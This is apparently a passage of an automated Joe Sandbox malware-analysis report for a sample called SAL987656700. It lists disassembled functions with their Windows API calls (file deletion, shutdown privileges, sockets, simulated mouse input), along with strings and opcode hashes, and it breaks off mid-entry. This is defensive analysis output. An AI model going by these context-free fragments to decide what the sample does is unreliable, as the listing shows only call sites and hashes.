                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: 82975adcf59ad7dbf617b487c833b21fa96ee0cc7b12faa279d478a53f74f18f
                                      • Instruction ID: 18d791a861ab7f1cbda5de3f2e1f12595a2f2538af285b3f19d38b116788e829
                                      • Opcode Fuzzy Hash: 82975adcf59ad7dbf617b487c833b21fa96ee0cc7b12faa279d478a53f74f18f
                                      • Instruction Fuzzy Hash: 5A31E2B264421D6BDB10AFB4DC08BEE37ACEF49321F108455FA65E21A0EB34DD80CA10
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00918D5A
                                      • GetFocus.USER32 ref: 00918D6A
                                      • GetDlgCtrlID.USER32(00000000), ref: 00918D75
                                      • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00918E1D
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00918ECF
                                      • GetMenuItemCount.USER32(?), ref: 00918EEC
                                      • GetMenuItemID.USER32(?,00000000), ref: 00918EFC
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00918F2E
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00918F70
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00918FA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow
                                      • String ID: 0
                                      • API String ID: 1669892757-4108050209
                                      • Opcode ID: 3ed44656f8c01f72e23c022837a9e63267fcd41cfe3d83aede720aecc66162da
                                      • Instruction ID: 8b28fd99f8f6902d620191c92cb84f5bde8f8df07564f8c7d3202f79f01536c5
                                      • Opcode Fuzzy Hash: 3ed44656f8c01f72e23c022837a9e63267fcd41cfe3d83aede720aecc66162da
                                      • Instruction Fuzzy Hash: 5A81AF717083099FDB10DF14D884AEBBBEAFB88354F140919F985D7291DB30D981EBA2
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008F97BE
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 008F9819
                                      • FindClose.KERNEL32(00000000), ref: 008F9824
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 008F9840
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F9890
                                      • SetCurrentDirectoryW.KERNEL32(00946B7C), ref: 008F98AE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008F98B8
                                      • FindClose.KERNEL32(00000000), ref: 008F98C5
                                      • FindClose.KERNEL32(00000000), ref: 008F98D5
                                        • Part of subcall function 008EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008EDB00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: 79feca6af464418a11f6e4af8051096e6b1d3b326f3d54fcc85cf94fbe91842e
                                      • Instruction ID: 0b205435426a79d0764a869ed7e7756e7b197f37e8e77d3c95d3712e9d9b2610
                                      • Opcode Fuzzy Hash: 79feca6af464418a11f6e4af8051096e6b1d3b326f3d54fcc85cf94fbe91842e
                                      • Instruction Fuzzy Hash: 7231F47165421D6AEB10EFB4DC48BEE37ACFF46364F108165F9A0E2190DB30DE85CA61
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 008F8257
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 008F8267
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008F8273
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008F8310
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F8324
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F8356
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008F838C
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F8395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local$System
                                      • String ID: *.*
                                      • API String ID: 1464919966-438819550
                                      • Opcode ID: 8291877048c71e10c8a027ff23a950d794e776a3c1d1e3cff292d97e95cac0df
                                      • Instruction ID: b160214f34cbf1d65fdd21c1020961b4f373835d5a3b51d423d9005ec74121b8
                                      • Opcode Fuzzy Hash: 8291877048c71e10c8a027ff23a950d794e776a3c1d1e3cff292d97e95cac0df
                                      • Instruction Fuzzy Hash: 5A615BB26083499FDB10EF64C8409AEB3E8FF89314F04891DFA99D7251DB31E945CB92
                                      APIs
                                        • Part of subcall function 00883AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00883A97,?,?,00882E7F,?,?,?,00000000), ref: 00883AC2
                                        • Part of subcall function 008EE199: GetFileAttributesW.KERNEL32(?,008ECF95), ref: 008EE19A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008ED122
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 008ED1DD
                                      • MoveFileW.KERNEL32(?,?), ref: 008ED1F0
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 008ED20D
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008ED237
                                        • Part of subcall function 008ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,008ED21C,?,?), ref: 008ED2B2
                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 008ED253
                                      • FindClose.KERNEL32(00000000), ref: 008ED264
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 1946585618-1173974218
                                      • Opcode ID: 683c762df736f8188d6f476b3ce6e2583bfdd14f3553afcc7e13fbf6caa5c3c1
                                      • Instruction ID: 20c1bfdc1cba87fb61e1c9f941634c3c1889857b7b9b230025286875767abfe6
                                      • Opcode Fuzzy Hash: 683c762df736f8188d6f476b3ce6e2583bfdd14f3553afcc7e13fbf6caa5c3c1
                                      • Instruction Fuzzy Hash: 4A61593180524D9ACF15EBE5CA529FDB775FF16300F244065E412B7191EB31AF09DB62
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 52efd1703d3e428fd8c7897f94e8410a065db93b9cd6bac94834df0e7dec20a4
                                      • Instruction ID: af93cf1f03a801063145a60ec959eef69a642268f5d98cfb6a9bad46fb7b29b8
                                      • Opcode Fuzzy Hash: 52efd1703d3e428fd8c7897f94e8410a065db93b9cd6bac94834df0e7dec20a4
                                      • Instruction Fuzzy Hash: EB41CE71208215AFE320DF29E888B69BBE1FF44358F14C499E565CBA72C775EC41CB90
                                      APIs
                                        • Part of subcall function 008E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E170D
                                        • Part of subcall function 008E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E173A
                                        • Part of subcall function 008E16C3: GetLastError.KERNEL32 ref: 008E174A
                                      • ExitWindowsEx.USER32(?,00000000), ref: 008EE932
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $ $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-3163812486
                                      • Opcode ID: 732711eb6f99e447d2ec0aab9e9e4e79d20bbb281f79ec81ec54b5fc715b42ba
                                      • Instruction ID: f054dae0e090a0fa15572ed0f993aa17d5b23b9a21798aba15667a8f39df4217
                                      • Opcode Fuzzy Hash: 732711eb6f99e447d2ec0aab9e9e4e79d20bbb281f79ec81ec54b5fc715b42ba
                                      • Instruction Fuzzy Hash: 530126B2B20255ABEB1476BA9C8AFFB769CF716744F144821F812E31D3E6B09C4481A0
                                      APIs
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00901276
                                      • WSAGetLastError.WS2_32 ref: 00901283
                                      • bind.WS2_32(00000000,?,00000010), ref: 009012BA
                                      • WSAGetLastError.WS2_32 ref: 009012C5
                                      • closesocket.WS2_32(00000000), ref: 009012F4
                                      • listen.WS2_32(00000000,00000005), ref: 00901303
                                      • WSAGetLastError.WS2_32 ref: 0090130D
                                      • closesocket.WS2_32(00000000), ref: 0090133C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                      • String ID:
                                      • API String ID: 540024437-0
                                      • Opcode ID: 85c8591a132f78b98ae16cceb365da1e4c7981cd2932c547de66c2456b44be9f
                                      • Instruction ID: 8d20a75e795c19abaac7af6163a37fd8281ec501a3170234f64359b78703b00c
                                      • Opcode Fuzzy Hash: 85c8591a132f78b98ae16cceb365da1e4c7981cd2932c547de66c2456b44be9f
                                      • Instruction Fuzzy Hash: 7E4160716001009FD710DF68D589B69BBE5BF86318F188198E8669F2D6C771ED81CBE1
                                      APIs
                                      • _free.LIBCMT ref: 008BB9D4
                                      • _free.LIBCMT ref: 008BB9F8
                                      • _free.LIBCMT ref: 008BBB7F
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00923700), ref: 008BBB91
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0095121C,000000FF,00000000,0000003F,00000000,?,?), ref: 008BBC09
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00951270,000000FF,?,0000003F,00000000,?), ref: 008BBC36
                                      • _free.LIBCMT ref: 008BBD4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                      • String ID:
                                      • API String ID: 314583886-0
                                      • Opcode ID: 63d144fcc7d679ce7c9b555f9dfec1470ecb62401d4d233c7c36c315017ef061
                                      • Instruction ID: 3417f9b72a1a8b716d5ea41d7e76864c0fa9d15e36a8d6867aedc9a46f0ad4e4
                                      • Opcode Fuzzy Hash: 63d144fcc7d679ce7c9b555f9dfec1470ecb62401d4d233c7c36c315017ef061
                                      • Instruction Fuzzy Hash: CFC11471A04209AFDB20DF699C51BEEBBE8FF45320F1841AAE494D7352EBB09E41C751
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                        • Part of subcall function 0089912D: GetCursorPos.USER32(?), ref: 00899141
                                        • Part of subcall function 0089912D: ScreenToClient.USER32(00000000,?), ref: 0089915E
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000001), ref: 00899183
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000002), ref: 0089919D
                                      • ReleaseCapture.USER32 ref: 00918B77
                                      • SetWindowTextW.USER32(?,00000000), ref: 00918C12
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00918C25
                                      • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00918CFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 973565025-2107944366
                                      • Opcode ID: 3969a2fd3847c2ef7faaac5a8327a40f01ea6145669c956c9930b72c77a2540f
                                      • Instruction ID: cd113b800bc15caeea90aa96a8f263fc3d6989397457e5bcaf22660251136bc8
                                      • Opcode Fuzzy Hash: 3969a2fd3847c2ef7faaac5a8327a40f01ea6145669c956c9930b72c77a2540f
                                      • Instruction Fuzzy Hash: C8519970208304AFD714EF24DC56BAA77E4FB88755F00062DF996A72E1CB709944DBA2
                                      APIs
                                        • Part of subcall function 00883AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00883A97,?,?,00882E7F,?,?,?,00000000), ref: 00883AC2
                                        • Part of subcall function 008EE199: GetFileAttributesW.KERNEL32(?,008ECF95), ref: 008EE19A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008ED420
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 008ED470
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008ED481
                                      • FindClose.KERNEL32(00000000), ref: 008ED498
                                      • FindClose.KERNEL32(00000000), ref: 008ED4A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 2649000838-1173974218
                                      • Opcode ID: 04185e8951d5993d04f99af715b9d9219aaa61d3ba19e197e6674223157f20d8
                                      • Instruction ID: 825b39cb915b80163f80f1a4e10fe17f552184d9bbde39d044c9276ffcadbd20
                                      • Opcode Fuzzy Hash: 04185e8951d5993d04f99af715b9d9219aaa61d3ba19e197e6674223157f20d8
                                      • Instruction Fuzzy Hash: C4313C7101C3859BC215FF68D8918AFB7A8FEA6314F444A2DF4E1D2191EB30EA09D767
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: c1c9f0bf885baea69cb69417e537cecb26468f1de3714a0f7ffabe954b1792cc
                                      • Instruction ID: 5673ceeac643cd62dcf347b7b14fd41087ba91241830006a15ea072f75a42674
                                      • Opcode Fuzzy Hash: c1c9f0bf885baea69cb69417e537cecb26468f1de3714a0f7ffabe954b1792cc
                                      • Instruction Fuzzy Hash: 3AC22771E086298FDB25CE289D407EAB7B5FB49305F1441EAD94DE7341E774AE818F40
                                      APIs
                                      • _wcslen.LIBCMT ref: 008F64DC
                                      • CoInitialize.OLE32(00000000), ref: 008F6639
                                      • CoCreateInstance.COMBASE(0091FCF8,00000000,00000001,0091FB68,?), ref: 008F6650
                                      • CoUninitialize.COMBASE ref: 008F68D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: ae2bc6ee1add181c4efff1f078151c7246a9cf2cc0c44d19c4d7690cccc9cc9d
                                      • Instruction ID: dfbcee3c85fc893d195865354172743578ad73592f2f9f683397a9497a830a35
                                      • Opcode Fuzzy Hash: ae2bc6ee1add181c4efff1f078151c7246a9cf2cc0c44d19c4d7690cccc9cc9d
                                      • Instruction Fuzzy Hash: D4D15971508205AFD314EF28C881D6BB7E9FF98304F14496DF695DB291EB70E905CBA2
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 009022E8
                                        • Part of subcall function 008FE4EC: GetWindowRect.USER32(?,?), ref: 008FE504
                                      • GetDesktopWindow.USER32 ref: 00902312
                                      • GetWindowRect.USER32(00000000), ref: 00902319
                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00902355
                                      • GetCursorPos.USER32(?), ref: 00902381
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009023DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                      • String ID:
                                      • API String ID: 2387181109-0
                                      • Opcode ID: b376302ef7750d12e7ffdf053e66f46af5b3fd72280a74e322fde57c60f0d254
                                      • Instruction ID: 378b4bef3b8b820247849918de78c8e22ec02889adc134c9d517f096f9d152a9
                                      • Opcode Fuzzy Hash: b376302ef7750d12e7ffdf053e66f46af5b3fd72280a74e322fde57c60f0d254
                                      • Instruction Fuzzy Hash: 1431DE72608315AFC720DF14C849B9BBBAAFF84710F004919F985D7191DB34EA08CB92
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 008F9B78
                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 008F9C8B
                                        • Part of subcall function 008F3874: GetInputState.USER32 ref: 008F38CB
                                        • Part of subcall function 008F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008F3966
                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 008F9BA8
                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 008F9C75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
